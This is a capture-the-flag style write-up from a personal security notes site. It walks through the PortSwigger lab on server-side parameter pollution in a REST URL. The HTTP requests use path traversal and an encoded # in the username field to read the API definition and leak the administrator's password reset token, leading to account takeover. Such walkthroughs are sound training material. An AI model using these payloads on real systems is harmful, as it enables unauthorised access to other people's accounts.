âŗ
Ichyaboy
  • 👋Ichyaboy
  • Hackthebox Related
    • 🎰Machines
      • Linux based Machines
        • Talkative
        • Encoding
      • Windows based machines
        • Silo
    • 🕹ī¸Challenges (coming soon)
  • Portswigger Related
    • 🔧Server-side topics
      • Business logic flaws
        • Excessive trust in client-side controls
        • 2FA Broken Logic
        • High-level logic vulnerability
        • Inconsistent handling of exceptional input
        • Inconsistent security controls
        • Weak isolation on dual-use endpoint
        • Low-level logic flaw
        • Infinite money logic flaw
      • Information Disclosure
        • Information disclosure in error messages
        • Information disclosure on debug page
        • Source code disclosure via backup files
        • Authentication bypass via information disclosure
        • Information disclosure in version control history
      • Access Control
        • Unprotected admin functionality
        • Unprotected admin functionality with unpredictable URL
        • User role controlled by request parameter
        • User role can be modified in user profile
        • User ID controlled by request parameter
        • User ID controlled by request parameter, with unpredictable user IDs
        • User ID controlled by request parameter with data leakage in redirect
        • User ID controlled by request parameter with password disclosure
        • Insecure direct object references
        • URL-based access control can be circumvented
        • Method-based access control can be circumvented
        • Multi-step process with no access control on one step
        • Referer-based access control
      • File Upload
        • Remote code execution via web shell upload
        • Web shell upload via Content-Type restriction bypass
        • Web shell upload via path traversal
        • Web shell upload via extension blacklist bypass
        • Web shell upload via obfuscated file extension
        • Remote code execution via polyglot web shell upload
        • Web shell upload via race condition
      • Race Conditions
        • Limit overrun race conditions
        • Bypassing rate limits via race conditions
        • Multi endpoint race conditions
        • Single endpoint race conditions
        • Time sensitive vulnerabilities
        • Partial construction race conditions
      • SSRF
        • Basic SSRF against the local server
        • Basic SSRF against another back end system
        • Blind SSRF with out of band detection
        • SSRF with blacklist based input filter
        • SSRF with filter bypass via open redirection vulnerability
        • Blind SSRF with Shellshock exploitation
        • SSRF with whitelist based input filter
      • XXE Injection
        • Exploiting XXE using external entities to retrieve files
        • Exploiting XXE to perform SSRF attacks
        • Blind XXE with out of band interaction
        • Blind XXE with out of band interaction via XML parameter entities
        • Exploiting blind XXE to exfiltrate data using a malicious external DTD
        • Exploiting blind XXE to retrieve data via error messages
        • Exploiting XInclude to retrieve files
        • Exploiting XXE via image file upload
        • Exploiting XXE to retrieve data by repurposing a local DTD
      • Nosql Injection
        • Detecting NoSQL injection
        • Exploiting NoSQL operator injection to bypass authentication
        • Exploiting NoSQL injection to extract data
        • Exploiting NoSQL operator injection to extract unknown fields
      • Api Testing
        • Exploiting an API endpoint using documentation
        • Exploiting server side parameter pollution in a query string
        • Finding and exploiting an unused API endpoint
        • Exploiting a mass assignment vulnerability
        • Exploiting server side parameter pollution in a REST URL
    • đŸŽ¯Client-side topics
      • Cross-site scripting (XSS)
        • Stored XSS
          • Stored XSS into HTML context with nothing encoded
          • Stored XSS into anchor href attribute with double quotes HTML encoded
          • Stored XSS into onclick event with angle brackets and double quotes HTML encoded and single quotes and backslash escaped
        • Reflected XSS
          • Reflected XSS into HTML context with nothing encoded
          • Reflected XSS into attribute with angle brackets HTML encoded
          • Reflected XSS into a JavaScript string with angle brackets HTML encoded
          • Reflected XSS into HTML context with most tags and attributes blocked
          • Reflected XSS into HTML context with all tags blocked except custom ones
          • Reflected XSS with some SVG markup allowed
          • Reflected XSS in canonical link tag
          • Reflected XSS into a JavaScript string with single quote and backslash escaped
          • Reflected XSS into a JavaScript string with angle brackets and double quotes HTML encoded and single quotes escaped
          • Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped
          • Reflected XSS with event handlers and href attributes blocked
          • Reflected XSS in a JavaScript URL with some characters blocked
        • DOM-based XSS
          • DOM XSS in document.write sink using source location.search
          • DOM XSS in innerHTML sink using source location.search
          • DOM XSS in jQuery anchor href attribute sink using location.search source
          • DOM XSS in jQuery selector sink using a hashchange event
          • DOM XSS in document.write sink using source location.search inside a select element
          • DOM XSS in AngularJS expression with angle brackets and double quotes HTML encoded
          • Reflected DOM XSS
          • Stored DOM XSS
        • CSP Bypass
          • Reflected XSS protected by CSP, with CSP bypass
          • Reflected XSS protected by very strict CSP, with dangling markup attack
        • Client-side template injection
          • Reflected XSS with AngularJS sandbox escape without strings
          • Reflected XSS with AngularJS sandbox escape and CSP
        • Common XSS Attacks
          • Exploiting cross site scripting to steal cookies
          • Exploiting cross site scripting to capture passwords
          • Exploiting XSS to perform CSRF
      • WebSockets
        • Manipulating WebSocket messages to exploit vulnerabilities
        • Cross site WebSocket hijacking
        • Manipulating the WebSocket handshake to exploit vulnerabilities
      • Cross-site Request forgery (CSRF)
        • CSRF vulnerability with no defenses
        • CSRF where token validation depends on request method
        • CSRF where token validation depends on token being present
        • CSRF where token is not tied to user session
        • CSRF where token is tied to non session cookie
        • CSRF where token is duplicated in cookie
        • SameSite Lax bypass via method override
        • SameSite Strict bypass via client side redirect
        • SameSite Strict bypass via sibling domain
        • SameSite Lax bypass via cookie refresh
        • CSRF where Referer validation depends on header being present
        • CSRF with broken Referer validation
      • Cross-origin resource sharing
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Clickjacking
        • Basic clickjacking with CSRF token protection
        • Clickjacking with form input data prefilled from a URL parameter
        • Clickjacking with a frame buster script
        • Exploiting clickjacking vulnerability to trigger DOM based XSS
        • Multistep clickjacking
      • DOM-based vulnerabilities
        • DOM XSS using web messages
        • DOM XSS using web messages and a JavaScript URL
        • DOM XSS using web messages and JSON.parse
        • DOM based open redirection
        • DOM based cookie manipulation
        • Exploiting DOM clobbering to enable XSS
        • Clobbering DOM attributes to bypass HTML filters
  • Resources
    • đŸŗī¸Cheatsheets
      • Basic Tools
      • Footprinting
      • Web Inofrmation Gathering
      • Nmap
      • File Transfer
      • Passwords Attacks
      • USING THE METASPLOIT FRAMEWORK
      • Shells & Payloads
      • Attacking Common Services
      • Pivoting, Tunneling, and Port Forwarding
    • 🏴Useful Scripts
      • NoSQL REGEX Password Length
      • NoSQL REGEX Password
      • Creds BruteForce CSRF Handling
Powered by GitBook
On this page
  • Description
  • Approach
  1. Portswigger Related
  2. Server-side topics
  3. Api Testing

Exploiting server side parameter pollution in a REST URL

Description

To solve the lab, log in as the administrator and delete carlos.

Approach

After accessing the lab, I enabled the FoxyProxy extension to proxy all my requests through Burp Suite. Two requests got my attention: one fetching a JavaScript file and the other a POST request to /forgot-password.

Starting with the GET /static/js/forgotPassword.js, there is an interesting part in the JavaScript script:

forgotPwdReady(() => {
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    const resetToken = urlParams.get('reset-token');
    if (resetToken)
    {
        window.location.href = `/forgot-password?passwordResetToken=${resetToken}`;
    }

This part is responsible for getting the value of passwordResetToken and verifying it. If it exists, it redirects with a GET request to /forgot-password with that passwordResetToken.

From this information, I can build an attack path to get the administrator's passwordResetToken, reset their password, log in as them, and delete the user Carlos.

I started working on how to get the passwordResetToken of the administrator. I went to the POST /forgot-password request and sent it to the repeater in Burp Suite to start working on it. I started by truncating the query string with the # character:

POST /forgot-password HTTP/2
Host: 0ada009f03b2058781472faf00550026.web-security-academy.net
Cookie: session=bb7bjqWIY6WBTvIkezybzDfZtiBq6cJP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=vBr4ih5Bd22dgiBe4Pkw1y2jCUgSgVDX&username=administrator%23

I got this error:

HTTP/2 404 Not Found
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 86

{
  "type": "error",
  "result": "Invalid route. Please refer to the API definition"
}

From this, I understood that the truncation worked, but it destroyed the query string, making it unable to reach the intended route. To clarify, imagine this is the normal route:

/api/library/books/{book}/category/{category}

And I sent this:

book=HarryPotter%23

The query string would become:

/api/library/books/HarryPotter%23

That's not a valid route, so the API triggers an error indicating an invalid route.

Going back to the analysis, I tried using path traversal with common API definition file names, starting with the one mentioned in the course: openapi.json. After some attempts, I got a response after passing this payload URL-encoded: administrator../../../../../../openapi.json#.

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=administrator%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fopenapi.json%23

The response was:

HTTP/2 500 Internal Server Error
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 629

{
  "error": "Unexpected response from API server:
{
  "openapi": "3.0.0",
  "info": {
    "title": "User API",
    "version": "2.0.0"
  },
  "paths": {
    "/api/internal/v1/users/{username}/field/{field}": {
      "get": {
        "tags": [
          "users"
        ],
        "summary": "Find user by username",
        "description": "API Version 1",
        "parameters": [
          {
            "name": "username",
            "in": "path",
            "description": "Username",
            "required": true,
            "schema": {
        ..."
}

From this, I could see the /api/internal/v1/users/{username}/field/{field} route, which helped me understand the invalid route error I was getting.

I decided to go for the reset token of the administrator:

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=administrator/field/passwordResetToken%23

I got this error:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 107

{
  "type": "error",
  "result": "This version of API only supports the email field for security reasons"
}

I couldn't get it this way, but looking at the documentation, I saw it was using version 2 of the API. I confirmed this by reaching the token again from a full path where the version is equal to 2:

../../v2/users/administrator/field/passwordResetToken#

When sending this request:

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=%2e%2e%2f%2e%2e%2fv2/users/administrator/field/passwordResetToken%23

I got the same error, confirming my theory:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 107

{
  "type": "error",
  "result": "This version of API only supports the email field for security reasons"
}

Now, I tried using an older version, version 1, to see if it worked:

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0


csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=%2e%2e%2f%2e%2e%2fv1/users/administrator/field/passwordResetToken%23

I got the reset token in the response:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 82

{
  "type": "passwordResetToken",
  "result": "pgjg38611p8vj5bozjcc0e0r5u3mjiso"
}

Now, by sending this request:

GET /forgot-password?passwordResetToken=pgjg38611p8vj5bozjcc0e0r5u3mjiso HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

In the response, I could see the password reset page for the administrator user. By simply right-clicking the response and clicking Show response in browser, I could copy and paste the URL into the browser and reset the administrator's password. Finally, I logged in as the administrator and deleted the user Carlos, which resulted in solving the lab.

PreviousExploiting a mass assignment vulnerabilityNextClient-side topics
🔧